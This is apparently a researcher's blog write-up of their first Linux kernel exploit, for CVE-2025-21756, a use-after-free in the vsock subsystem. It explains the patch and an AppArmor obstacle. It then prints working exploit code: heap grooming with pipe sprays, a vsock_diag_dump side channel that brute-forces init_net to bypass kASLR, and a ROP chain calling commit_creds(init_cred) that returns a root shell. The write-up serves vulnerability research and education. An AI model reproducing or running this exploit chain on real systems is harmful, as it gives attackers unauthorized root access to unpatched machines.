Linux Kernel Exploitation

CVE-2025-21756: Attack of the Vsock

What started off as casual scrolling through the KernelCTF submissions quickly spiraled into a weeks-long deep dive into a deceptively simple patch - and my first root shell from a Linux kernel exploit!

While browsing the public spreadsheet of submissions, I saw an interesting entry: exp237. The bug patch seemed incredibly simple, and I was amazed that a researcher was able to leverage the issue for privilege escalation. So I set off on a journey that would lower my GPA and occasionally leave me questioning my sanity: My first linux kernel exploit!

Setting up the Environment

Before we can start diving into the exploit development, we need to set up a good linux kernel debugging environment. I decided to use QEMU with scripts from midas's awesome writeup with the gef-kernel GDB extensions. I chose to start with linux kernel 6.6.75 since it was close to the versions being exploited by the other researchers. I actually completed this entire project within WSL so that I could write the exploit on my Windows school computer!

kernel exploit development environment screenshot

Patch Analysis

As you can see from the patch below, the fix only involves a few lines of code. From the code and the description, it is shown that a transport reassignment can trigger vsock_remove_sock, which calls vsock_remove_bound which decreases the reference counter on a vsock object incorrectly (if the socket was unbound to begin with).

When an object's reference counter reaches zero in the kernel, that object is freed to its respective memory manager. Ideally after freeing the vsock object, we will be able to trigger some sort of Use After Free (UAF) to gain a better primitive and escalate privileges.

            
--- a/net/vmw_vsock/af_vsock.c
+++ b/net/vmw_vsock/af_vsock.c
@@ -337,7 +337,10 @@ EXPORT_SYMBOL_GPL(vsock_find_connected_socket);
 
 void vsock_remove_sock(struct vsock_sock *vsk)
 {
-	vsock_remove_bound(vsk);
+	/* Transport reassignment must not remove the binding. */
+	if (sock_flag(sk_vsock(vsk), SOCK_DEAD))
+		vsock_remove_bound(vsk);
+
 	vsock_remove_connected(vsk);
 }
 EXPORT_SYMBOL_GPL(vsock_remove_sock);
@@ -821,12 +824,13 @@ static void __vsock_release(struct sock *sk, int level)
 	 */
 	lock_sock_nested(sk, level);
 
+	sock_orphan(sk);
+
 	if (vsk->transport)
 		vsk->transport->release(vsk);
 	else if (sock_type_connectible(sk->sk_type))
 		vsock_remove_sock(vsk);
 
-	sock_orphan(sk);
 	sk->sk_shutdown = SHUTDOWN_MASK;
 
 	skb_queue_purge(&sk->sk_receive_queue);
            
       

Along with this patch, the maintainers also added a test-case for the bug, which proved useful in starting out the exploit.

        
#define MAX_PORT_RETRIES	24	/* net/vmw_vsock/af_vsock.c */
#define VMADDR_CID_NONEXISTING	42

/* Test attempts to trigger a transport release for an unbound socket. This can
 * lead to a reference count mishandling.
 */
static void test_seqpacket_transport_uaf_client(const struct test_opts *opts)
{
	int sockets[MAX_PORT_RETRIES];
	struct sockaddr_vm addr;
	int s, i, alen;

	s = vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET);

	alen = sizeof(addr);
	if (getsockname(s, (struct sockaddr *)&addr, &alen)) {
		perror("getsockname");
		exit(EXIT_FAILURE);
	}

	for (i = 0; i < MAX_PORT_RETRIES; ++i)
		sockets[i] = vsock_bind(VMADDR_CID_ANY, ++addr.svm_port,
					SOCK_SEQPACKET);

	close(s);
	s = socket(AF_VSOCK, SOCK_SEQPACKET, 0);
	if (s < 0) {
		perror("socket");
		exit(EXIT_FAILURE);
	}

	if (!connect(s, (struct sockaddr *)&addr, alen)) {
		fprintf(stderr, "Unexpected connect() #1 success\n");
		exit(EXIT_FAILURE);
	}
	/* connect() #1 failed: transport set, sk in unbound list. */

	addr.svm_cid = VMADDR_CID_NONEXISTING;
	if (!connect(s, (struct sockaddr *)&addr, alen)) {
		fprintf(stderr, "Unexpected connect() #2 success\n");
		exit(EXIT_FAILURE);
	}
	/* connect() #2 failed: transport unset, sk ref dropped? */

	addr.svm_cid = VMADDR_CID_LOCAL;
	addr.svm_port = VMADDR_PORT_ANY;

	/* Vulnerable system may crash now. */
	bind(s, (struct sockaddr *)&addr, alen);

	close(s);
	while (i--)
		close(sockets[i]);

	control_writeln("DONE");
}
        
    

Initial Ideas

With this being a UAF bug, I initially had the idea of attempting a cross-cache attack. My broad plan was as follows...

  1. Trigger the arbitrary free of a vsock object
  2. Reclaim the page with some user controlled object like msg_msg
  3. Corrupt some function pointer in the vsock object to gain code execution

We’ve Got a Panic!

Slightly modifying and running the test code on my VM (see crash.c) actually leads to the kernel panic seen below! Through some debugging, we find that the vsock object is actually still linked into the vsock_bind_table despite being freed. Great!

The panic occurs when AppArmor dereferences a NULL sk_security pointer during a bind() call on the recycled socket. This confirms the UAF and highlights the obstacle posed by LSM hooks (see below).

Roadblock #1: AppArmor + LSM

AppArmor

The first major roadblock we hit is apparmor. This is the seen in the above callstack where the kernel invokes security_socket_bind and aa_sk_perm. The security_socket_* functions are Linux Security Module (LSM) hooks which call into AppArmor. So how is our socket failing for AppArmor security check?

Investigating the problem, it is apparent that __sk_destruct calls sk_prot_free which calls security_sk_free. So when we trigger our bug to decrement the refcnt and the vsock is freed, the sk->sk_security pointer will be zeroed out.



/**
 * security_sk_free() - Free the sock's LSM blob
 * @sk: sock
 *
 * Deallocate security structure.
 */
void security_sk_free(struct sock *sk)
{
	call_void_hook(sk_free_security, sk);
	kfree(sk->sk_security);
	sk->sk_security = NULL;
}
    

But when we call security_socket_bind, the AppArmor function dereferences this sk->sk_security struct. Worse yet, it seems like almost every socket function has an LSM counterpart. In short: the kernel grants us a dangling pointer to the socket — but AppArmor ensures we crash before we can do anything useful with it. So how can we UAF if we can't even call any useful functions with our recycled socket?


gef> p security_socket_*
security_socket_accept             security_socket_getpeername        
security_socket_bind               security_socket_getpeersec_dgram   
security_socket_connect            security_socket_getpeersec_stream  
security_socket_create             security_socket_getsockname        
security_socket_getsockopt         security_socket_sendmsg
security_socket_listen             security_socket_setsockopt
security_socket_post_create        security_socket_shutdown
security_socket_recvmsg            security_socket_socketpair

We have two main options.

  1. Forge an sk_security pointer to a fake object
  2. Find some functions which aren't protected by apparmor

I decided to explore option #2 first.

Chinks in the (App)Armor & Defeating kASLR

My first focus was to find a way to leak some addresses. Some "obvious" choices would be functions like getsockopt or getsockname but these functions are all protected by apparmor. Browsing through source code, I stumbled upon the vsock_diag_dump feature. This was a super interesting function, as it isn't protected by apparmor. The code is listed below.


static int vsock_diag_dump(struct sk_buff *skb, struct netlink_callback *cb)
{
	
	// ... snip ...

	/* Bind table (locally created sockets) */
	if (table == 0) {
		while (bucket < ARRAY_SIZE(vsock_bind_table)) {
			struct list_head *head = &vsock_bind_table[bucket];

			i = 0;
			list_for_each_entry(vsk, head, bound_table) {
				struct sock *sk = sk_vsock(vsk);

				if (!net_eq(sock_net(sk), net))
					continue;
				if (i < last_i)
					goto next_bind;
				if (!(req->vdiag_states & (1 << sk->sk_state)))
					goto next_bind;
				if (sk_diag_fill(sk, skb,
						 NETLINK_CB(cb->skb).portid,
						 cb->nlh->nlmsg_seq,
						 NLM_F_MULTI) < 0)
					goto done;
next_bind:
				i++;
			}
			last_i = 0;
			bucket++;
		}

		table++;
		bucket = 0;
	}

	// ... snip ...

}
    

Since our freed socket is still in the bind table, there are only two checks keeping us from dumping some information from the socket. The sk->sk_state check is easy to pass (not requiring any leaks), but the sk_net check seems tougher. How can we forge a sk->__sk_common->skc_net pointer without having a kASLR leak yet? This is where I was stuck for around a week, but was able to overcome this difficulty thanks to help from the community on discord!

Diag Dump Sidechannel For Fun & Profit

Stuck in my tracks, I resorted to the kernelctf community, sharing the above checks on the discord. Almost immediately, @h0mbre responded with the idea of brute forcing the skc_net pointer, essentially using vsock_diag_dump as a side channel! Brilliant 🤯!

So in summary, we do the following to leak init_net...

  1. Spray pipes to reclaim the UAF'd socket's page

  2. Fill each pipe buffer QWORD-by-QWORD with controlled values

  3. Use vsock_diag_dump() as a side channel to detect if our overwritten struct is “valid enough” to bypass filtering

  4. Once vsock_diag_dump() stops reporting our socket, we know we corrupted skc_net

  5. We then brute force the lower bits of init_net until the socket is accepted again—giving us a full kASLR bypass

The suggestion to use pipe backing pages by @h0mbre turned out to be way more stable/usable than the msg_msg objects I was using before. With a little bit of work, I was able to get the following code to sucessfully leak the sk_net pointer.


int junk[FLUSH];
for (int i = 0; i < FLUSH; i++)
    junk[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);

puts("[+] pre alloc sockets");
int pre[PRE];
for (int i = 0; i < PRE; i++)
    pre[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);

// ... snip ... (alloc target & trigger uaf)

puts("[+] fill up the cpu partial list");
for (int i = 4; i < FLUSH; i += OBJS_PER_SLAB)
    close(junk[i]);

puts("[+] free all the pre/post alloc-ed objects");
for (int i = 0; i < POST; i++)
    close(post[i]);
for (int i = 0; i < PRE; i++)
    close(pre[i]);
    

The pre & post allocation of objects ensures that the entire page is actually returned to the buddy allocater (see this writeup). Below is the code to actually find the skc_net pointer.


int pipes[NUM_PIPES][2];
char page[PAGE_SIZE];
memset(page, 2, PAGE_SIZE); // skc_state must be 2

puts("[+] reclaim page");

int w = 0;
int j;
i = 0;
while (i < NUM_PIPES) {

    sleep(0.1);

    if (pipe(&pipes[i][0]) < 0) {
        perror("pipe");
        break;
    }

    printf(".");
    fflush(stdout);


    w = 0;
    while (w < PAGE_SIZE) {
        ssize_t written = write(pipes[i][1], page, 8);
        j = query_vsock_diag();
        w += written;
        if (j != 48) goto out;
    }
    i++;
    if (i % 32 == 0) puts("");
}
    

As you can see, this code just keeps creating new pipes and populating them one QWORD at a time (0x0202020202020202 to satisfy skc_state), until vsock_diag_dump doesn't find the victim socket anymore. This means that we have overwritten skc_net. Once we actually overwrite the pointer, we just need to brute force the lower 32-bits of the address in the same fasion.


long base = 0xffffffff84bb0000; // determined through experimentation
long off = 0;
long addy;
printf("[+] attempting net overwrite (aslr bypass).\n");

while (off < 0xffffffff) {


    close(pipes[i][0]);
    close(pipes[i][1]);

    if (pipe(&pipes[i][0]) < 0) {
        perror("pipe");
    }

    addy = base + off;

    write(pipes[i][1], page, w - 8);
    write(pipes[i][1], &addy, 8);

    if (off % 256 == 0) {
        printf("+");
        fflush(stdout);
    }

    j = query_vsock_diag();
    if (j == 48) {
        printf("\n[*] LEAK init_net @ 0x%lx\n", base + off);
        goto out2;
    }

    off += 128;

}
    

With the skc_net overwrite, we have killed two birds with one stone. We defeat kASLR and land at a known offset in our vsock object.

Now all that is left is to find a reliable way to redirect execution flow...

Controlling RIP

To control the instruction pointer, I resorted to the vsock_release function, since it is one of the few vsock functionalities not protected by apparmor.


static int vsock_release(struct socket *sock)
{
	struct sock *sk = sock->sk;

	if (!sk)
		return 0;

	sk->sk_prot->close(sk, 0);
	__vsock_release(sk, 0);
	sock->sk = NULL;
	sock->state = SS_FREE;

	return 0;
}
    

We are most interested in the call to sk->sk_prot->close(sk, 0). Since we control sk, we need a valid pointer to a pointer to a function. This had me stumped for a while, until I started thinking about using the other valid proto objects. I found that raw_proto had a pointer to an abort function shown below.


int raw_abort(struct sock *sk, int err)
{
	lock_sock(sk);

	sk->sk_err = err;
	sk_error_report(sk);
	__udp_disconnect(sk, 0);

	release_sock(sk);

	return 0;
}
    

This function calls into sk_error_report, which is shown below.


void sk_error_report(struct sock *sk)
{
	sk->sk_error_report(sk);

	switch (sk->sk_family) {
	case AF_INET:
		fallthrough;
	case AF_INET6:
		trace_inet_sk_error_report(sk);
		break;
	default:
		break;
	}
}
    

So if we can overwrite the sk->sk_error_report field of our socket with a stack pivot gadget, we should be able to jump to a ROP chain starting at the base of the socket.

A nice visualization of the state of the vsock after the overwrite is below.

sk->sk_prot --> &raw_proto
              ↳ .close = raw_abort
                          ↳ sk->sk_error_report(sk) → *stack pivot*

Another important mention is that it became necessary to forge the sk_lock member with some null bytes and pointers (determined through lots of debugging). With all of this figured out, I constructed the following ROP chain.


long kern_base = base + off - 0x3bb1f80;
printf("[*] leaked kernel base @ 0x%lx\n", kern_base);

// calculate some rop gadgets
long raw_proto_abort = kern_base + 0x2efa8c0;
long null_ptr = kern_base + 0x2eeaee0;
long init_cred = kern_base + 0x2c74d80;
long pop_r15_ret = kern_base + 0x15e93f;
long push_rbx_pop_rsp_ret = kern_base + 0x6b9529;
long pop_rdi_ret = kern_base + 0x15e940;
long commit_creds = kern_base + 0x1fcc40;
long ret = kern_base + 0x5d2;

// info for returning to usermode
long user_cs = 0x33;
long user_ss = 0x2b;
long user_rflags = 0x202;
long shell = (long)get_shell;

uint64_t* user_rsp = (uint64_t*)get_user_rsp();

// return to user mode
long swapgs_restore_regs_and_return_to_usermode = kern_base + 0x16011a6;

//getchar();

printf("[+] writing the rop chain\n");

close(pipes[i][0]);
close(pipes[i][1]);

if (pipe(&pipes[i][0]) < 0) {
    perror("pipe");
}

printf("[+] writing payload to vsk\n");
write(pipes[i][1], page, w - 56);

char buf[0x330];
memset(buf, 'A', 0x330);
char not[0x330];
memset(not, 0, 0x330);

// create the rop chain!
write(pipes[i][1], &pop_rdi_ret, 8); // stack pivot target
write(pipes[i][1], &init_cred, 8);
write(pipes[i][1], &ret, 8); 
write(pipes[i][1], &ret, 8);
write(pipes[i][1], &pop_r15_ret, 8); // junk
write(pipes[i][1], &raw_proto_abort, 8); // sk_prot (calls sk->sk_error_report())
write(pipes[i][1], &ret, 8);
write(pipes[i][1], &commit_creds, 8); // commit_creds(init_cred);
write(pipes[i][1], &swapgs_restore_regs_and_return_to_usermode, 8);
write(pipes[i][1], &null_ptr, 8); // rax
write(pipes[i][1], &null_ptr, 8); // rdi
write(pipes[i][1], &shell, 8); // rip
write(pipes[i][1], &user_cs, 8);
write(pipes[i][1], &user_rflags, 8);
write(pipes[i][1], user_rsp, 8); // rsp
write(pipes[i][1], &user_ss, 8);
write(pipes[i][1], buf, 0x18);
write(pipes[i][1], &\not, 8); // sk_lock
write(pipes[i][1], &\not, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
write(pipes[i][1], buf, 0x200);
write(pipes[i][1], &push_rbx_pop_rsp_ret, 8); // stack pivot [sk_error_report()]

//getchar();

close(s); // trigger the exploit!
    

Notice that I did not call prepare_kernel_cred(NULL) since this is no longer supported (causes a crash). Instead I opted to call commit_creds with init_cred - a structure with a constant offset from the kernel base possessing uid=gid=0. I also borrowed the swapgs_restore_regs_and_return_to_usermode technique from this blog. With all of those puzzle pieces in place, our exploit gives a root shell!

The final source code for the exploit is posted here. The exploit could still be much more reliable and elegant, but for my first kernel pwn I am happy with it!

Thank You!

For a bug involving just a few lines of patch code, this journey taught me way more about the kernel than I ever could have expected! I could never have completed this exploit without all of the super helpful hackers on the #kernelctf discord channel! Thank you all + happy pwning!